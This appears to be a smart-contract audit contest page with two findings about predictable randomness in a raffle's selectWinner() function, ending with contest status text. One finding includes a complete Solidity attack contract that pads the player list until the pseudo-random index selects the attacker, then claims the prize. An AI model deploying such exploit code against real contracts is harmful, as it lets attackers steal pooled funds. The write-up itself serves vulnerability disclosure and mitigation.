Predictable Randomness
Predictable Randomness in selectWinner() Allows Manipulation of Raffle Outcome
Description
-
The protocol selects the raffle winner using a pseudo-random value derived from on-chain variables such as
msg.sender,block.timestamp, andblock.difficulty.Normally, a raffle system should use a secure source of randomness so that no participant or caller can influence the result. However, in this implementation, the randomness source relies entirely on publicly available and partially controllable blockchain variables.
Because
msg.senderis controlled by the caller andblock.timestampcan be slightly influenced by block producers, an attacker can attempt to manipulate or predict the outcome by choosing the timing and caller of theselectWinner()transaction.
Risk
Likelihood: Medium
Attackers can control
msg.senderby calling the function themselves.Block producers have limited ability to influence
block.timestamp, allowing slight manipulation of randomness inputs.
Impact: Medium
The fairness of the raffle can be compromised.
Attackers may increase their probability of winning by timing or simulating transactions before submission.
Proof of Concept
An attacker can simulate potential outcomes off-chain before submitting the transaction:
Recommended Mitigation
Use a verifiable randomness source instead of predictable on-chain values.
A common mitigation is integrating Chainlink VRF or another secure randomness oracle.
Where randomNumber is obtained from a secure randomness provider such as Chainlink VRF.
This ensures that the raffle winner cannot be predicted or manipulated by participants or validators.
Lead Judging Commences
[H-03] Randomness can be gamed
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.